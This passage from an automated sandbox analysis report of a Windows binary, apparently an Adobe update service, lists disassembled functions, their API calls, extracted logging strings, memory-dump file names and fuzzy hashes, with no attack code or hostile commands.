                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$AdobeUpdateService: Process certificate didnt match to Adobe certificate!$main: Finished$main: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-108484121
                                                                                                                                                                                                                                                                    • Opcode ID: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction ID: aa4f7462551908f85693e87270aad57e37dee6bb7c79447cbb64f1a26d33a99d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D491F870A002189FEB14DF65CD5ABAE7BB4EB04718F14417EE405B73C1EBB86A05CB99
                                                                                                                                                                                                                                                                    Function 0046A3FC Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0046A40E
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0046A41D
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0046A426
                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0046A433
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction ID: e4e9c80c65a6a08ef3cfff89654f3def58ef4d81fe7765c738179de465d37d3f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F05F71C10209EBCB04DBB5DA49A9EBBF8EF28305F5148A69412E7150E774AB049F55
                                                                                                                                                                                                                                                                    Function 00479425 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0047951D
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00479527
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00479534
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: a19f73a4d9f4d0e54a9ed4dae2ef3fd1af3dc1133b3d865888961f1c74766716
                                                                                                                                                                                                                                                                    • Instruction ID: 7109313c7fa8fd350fdfa9001e6c8f204caf35ef787ef4bb10a63f32fd68b71d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a19f73a4d9f4d0e54a9ed4dae2ef3fd1af3dc1133b3d865888961f1c74766716
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB31D87590122CABCB21DF65DD88BCDBBB8BF18310F5041EAE40CA6251E7749F858F49
                                                                                                                                                                                                                                                                    Function 00460FA0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 92b4408d911e923283ad052d3412a50f4253902d7f48253863d126fe0516623a
                                                                                                                                                                                                                                                                    • Instruction ID: ab5e05bcc99bfceca36f26a0eb8b1f4f863e45577806241823cb0e5dbccfed84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b4408d911e923283ad052d3412a50f4253902d7f48253863d126fe0516623a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE01ECB5904719EBCB14CF99D941B9AFBF4FB48720F20862AE429A3790D33565108F94
                                                                                                                                                                                                                                                                    Function 0041F500 Relevance: 30.4, APIs: 11, Strings: 9, Instructions: 396sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,9E574B25,?,00000008), ref: 0041F537
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0041F53F
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F585
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F5C9
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F646
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterSleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Data size %i is larger than max buffer size, aborting write.$OOBEUtils$Out pipe handle is invalid, aborting write.$Pipe %p not initialized, aborting write.$Terminate channel$Writing data packet to pipe failed with error code %i$Writing info packet to pipe failed with error code %i$`J
                                                                                                                                                                                                                                                                    • API String ID: 4275215032-318403239
                                                                                                                                                                                                                                                                    • Opcode ID: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction ID: 357453fb2a3021c3316a4f80364e3140d53479557ee8387c2b372fbbb1bee486
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E10770B40208ABDB00DF65DD4ABDE7BB5AF45700F24013AF806A72D1DB7CAA458B5D
                                                                                                                                                                                                                                                                    Function 004056B0 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 296sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000028), ref: 0040587F
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • CreateIPCChannel failed for pipe %s, xrefs: 004058D0
                                                                                                                                                                                                                                                                    • Failed to sent communnication ID packet to the client, xrefs: 004059B9
                                                                                                                                                                                                                                                                    • Problem initializing Communication Channel. Quitting. Error code %d, xrefs: 004058A7
                                                                                                                                                                                                                                                                    • thread failed to resumed. fatal error, xrefs: 0040594C
                                                                                                                                                                                                                                                                    • Sent communnication ID packet to the client, xrefs: 004056EF
                                                                                                                                                                                                                                                                    • Successfully created the client thread, xrefs: 004059E8
                                                                                                                                                                                                                                                                    • Initializing Communication Channel with ACC with pipename: %s, xrefs: 00405862
                                                                                                                                                                                                                                                                    • failed to create a new thread for ipc communications. Fatal Error, xrefs: 0040591A
                                                                                                                                                                                                                                                                    • Failed in creating client thread, xrefs: 00405984
                                                                                                                                                                                                                                                                    • Failed in initial handshake with the client, xrefs: 004058F0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                                    • String ID: CreateIPCChannel failed for pipe %s$Failed in creating client thread$Failed in initial handshake with the client$Failed to sent communnication ID packet to the client$Initializing Communication Channel with ACC with pipename: %s$Problem initializing Communication Channel. Quitting. Error code %d$Sent communnication ID packet to the client$Successfully created the client thread$failed to create a new thread for ipc communications. Fatal Error$thread failed to resumed. fatal error
                                                                                                                                                                                                                                                                    • API String ID: 640476663-1070437462
                                                                                                                                                                                                                                                                    • Opcode ID: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction ID: dce432d37da255bfcb33f67ab20813508531a13952796c9d494c823ab279c1dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0A1D2B0A40615AFCB00DF65DC86B6E7BA4FF49704F10017AE505AB3D1DB78A914CB9A
                                                                                                                                                                                                                                                                    Function 00401A30 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 268synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401520,00000000,00000000,00000000), ref: 00401B0D
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00401A1C), ref: 00401C91
